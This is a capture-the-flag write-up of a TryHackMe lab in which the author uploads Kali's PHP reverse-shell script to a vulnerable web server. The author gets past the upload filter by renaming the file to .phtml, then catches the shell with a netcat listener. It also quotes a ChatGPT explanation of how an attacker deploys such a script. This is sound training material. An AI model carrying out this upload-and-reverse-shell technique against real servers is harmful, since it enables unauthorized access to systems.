Lab 41 – Getting a reverse shell on a server through a file upload
Last updated
Lab Objective:
Learn how to get a reverse shell on a vulnerable server through a file upload.
Lab Purpose:
A shell account is a user account on a remote server. This user account will usually give the user access to a shell via a command-line interface protocol such as telnet or SSH. Getting a shell on a server is usually the first main goal of an attacker when they are looking to hack into a server. From this position, they can navigate around your server and escalate their privileges to take over the server entirely.
Lab Tool:
Kali Linux
Lab Topology:
You can use a Windows machine or Kali Linux in a VM for this lab.
Theory
What is a reverse shell ?
A reverse shell is a type of remote access tool used in cybersecurity, often in penetration testing or malicious hacking, to gain control over a target system. SSH (Secure Shell) into a target machine is not considered a reverse shell. While both SSH and reverse shells provide remote access to a system, they differ in purpose, method of connection, and security mechanisms.
What is a shell account ?
A shell account is a user account on a remote server that provides access to a command-line interface (CLI), typically through a shell like Bash, Zsh, or another Unix shell. The primary purpose of a shell account is to allow users to interact with the operating system of the remote server through text-based commands.
What is a remote server ?
Assume that:
A is the attacker.
B is the compromised web server.
The term "remote server" generally refers to a computer or system that is being accessed over a network from another computer. The "remote" part implies that the server is not local to the person or system accessing it. Depending on the perspective, either A or B could be considered the "remote server."
Explanation:
From the Attacker's Perspective (A):
Remote Server: In this case, B (the compromised web server) is the remote server because it is the system that A (the attacker) is accessing over the network after penetration. The attacker’s local machine (A) is connecting to B to execute commands or perform other actions.
From the Compromised Server's Perspective (B):
Remote Server: From B's point of view, A’s machine could be considered the remote server, especially if B initiates a reverse shell back to A. In this situation, B connects to A’s machine, and A becomes the remote server that B is communicating with.
Detailed Scenario:
Scenario 1: Traditional Access (e.g., via SSH or direct access)
A (the attacker) uses SSH to connect to B (the web server). In this scenario, B is the remote server from A's perspective. A initiates the connection, and B is the server being accessed remotely.
Scenario 2: Reverse Shell
A (the attacker) has exploited a vulnerability on B (the web server) and sets up a reverse shell. B then initiates a connection back to A's machine. In this scenario, A’s machine could be considered the remote server from B's perspective because B is connecting out to A.
Setting Up
In this lab, we'll do some exploit into the TryHackMe web server for practicing. And we'll be playing in a room of TryHackMe:
Before anything else, we need to use a VPN to connect to this TryHackMe lab. TryHackMe labs are hosted on isolated, private networks. To access the virtual machines (VMs) and other resources in these labs, you need to connect to the TryHackMe network via a VPN
We'll check that our Kali has an OpenVPN:
Then go to:
Now, we'll follow the guide provided by 101labs.
"By following the steps shown in the figure above, go up to step 3 and download the OpenVPN client config (clientname.ovpn) file to the your Kali machine. Go to the location where you downloaded the file and run this command in terminal:
sudo openvpn clientname.ovpn
Upon successful connection, follow steps 4 and 5 as shown in the above figure. The IP address here is your address on the client side, and we will use this information later. Write it down."
As you can see in the picture above you'll also see the text above the download button:
If you're switching for the first time, you will need to redownload your configuration file. For best performance, please use the server that's geographically closest to you.
So, in my case. I will configure it to the "AU-Regular-1"
Now download the configuration file. Once finished, use the terminal to cd to it, and run the:
You should see the "Initialization Sequence Completed", and an ip on the top right section of your Kali monitor.
Now, leave this terminal alone, don't close it. Open another terminal to work on.
But now my problem has come, On my access web page, I still can not connected to the server. Why is that? . . .
I did a bit of research and I found this reddit post.
and there're these answers from the users.
So that I tried the ifconfig in my terminal.
There's one new interface 'tun0' already. I think everything should be okay then.
Let's get back to work.
Back to the room:
And click 'Join Room' button.
After scrolled down, you'll see the tasks they provided to get this room done. Now, click 'Start Machine' button.
And also, you can just click 'Complete' in this first Task since we finished it already.
Solving
Here we go the most fun part. 101labs stated in their walkthrough that:
The first step to any hack like this is to discover which ports are open using nmap.
So we go in our terminal:
After 15 minutes of scanning... There are 2 ports opening: 22, 80 Which aren't quite interesting, let's move on to the next step !
We'll use gobuster to enumerate the webserver for any interesting directories.
. . .
As we're waiting for the gobuster, let's answer some of the TryHackMe questions
For the apache version, run:
The apache version is: 2.4.29
Now back to gobuster, The gobuster is still running, but we can already see that there're some interesting directories.
The ones we're talking about are the '/uploads' and '/panel' Let's try check them out.
The /uploads directory seems like a directory that stores the uploaded files to the webserver.
There we go, the /panel seems like where we'll be uploading the file. Since this lab plays with exploiting by uploading a file. This is our place.
And at this point, we can answer all the Task 2 questions in TryHackMe room already.
Now back to the web page, Let's try uploading some files.
In this scenario, I'll try uploading the file named "test.txt" which was just created by me. Let's see how it works.
Oh god, I'm sorry but what does that even mean... LOL
Let's check the /uploads directory.
We can see our file right there.
Okay, since we know how it works.
IT'S TIME FOR SOME BAD GUY MOMENT 😈
In Kali, there's a file that written for this reverse shell purpose already inside the machine.
Which stores in this path: /usr/share/webshells/php/php-reverse-shell.php
Now we're gonna exploit this file into this lab's webserver. And later get a reverse shell to it.
We're going to copy that file into our comfortable area, in my case I'll copy it to my Desktop:
Since we have our file, let's try checking it. And also let's see how it works.
So in my terminal, I just casually cat it to see what's inside the file.
And there's a ton of texts, Once again it's time for my good-"new"-friend, ChatGPT. So I asked ChatGPT how does this file works, and how should the attacker work with this file. And this is the interesting answer from my friend.
How an Attacker Would Use This Script:
Preparation:
Modify IP and Port: Change the
$ipand$portvariables to the attacker's IP address and the port they are listening on. This is where the reverse shell will connect back to.Deploy the Script:
Upload: The attacker must upload the PHP script to a web-accessible directory on the target server. This might be done through a web application vulnerability (e.g., file upload functionality).
Execute: The attacker then needs to trigger the execution of the script. This could be done by accessing the script through a web browser or another method that invokes the PHP interpreter.
Set Up Listener:
The attacker should set up a listener on their own machine to receive the reverse connection. This is done using tools like
netcatornc:Here,
1234should match the port number specified in the PHP script.Gain Access:
Once the PHP script is executed and the connection is established, the attacker will have an interactive shell session on the target server. They can execute commands and interact with the server as if they were logged in directly.
Okay, thank you Chat.
Now let's configure our own ip and port number You can found it in this part of the file:
I changed the ip to my Kali local VPN ip address, and I did leave the port number just like that. Save the file, exit.
Okay now that we're already know how to work with the file. Let's upload the file into the webserver !
But this time it's not working. I can't upload the file. Why is that ?
It could be due to many possible reasons out there. But from the 101labs walkthrough they guided us that it could probably be due to the file extension limit from the webserver, it might not be receiving .php files.
And there's one file extension out there that's working similary as .php which is .phtml
.php vs .phtml
.php: Standard and most commonly used extension for PHP files.
.phtml: Less common and used to suggest a file that is primarily HTML with embedded PHP.
Both extensions work the same way when processed by the server, so the choice between them is largely a matter of convention or project-specific standards.
Let's try changing the file extension of our exploit file.
Okay, now our file should be ready once again. Let's reupload it.
And it worked this time. Thanks to the 101labs walkthrough.
Let's check the /uploads directory.
There's our exploit file.
Now, be ready to run it. As we're already know how the file works. We're going to set a listener to the webserver by running another terminal and run:
Okay, things should be ready now. We're going to run the exploit file by clicking it on the /uploads page. Let's click it.
After I clicked it, the page seems to be running something. Let's check our listener terminal.
And we have our reverse shell. 😈
This is the end of Lab 41 – Getting a reverse shell on a server through a file upload provided by CompTIA Security+ of 101labs.net
But the TryHackMe room is not finished ! as there's one CTF challenge right here.
And yes, we're going to capture it.
We're going to run the find command:
And there we found it, let's cat it.
We captured our flag.
The next lab is about privilege escalation, which is the next episode to this Lab 41, Let's move on to the Lab 42 !
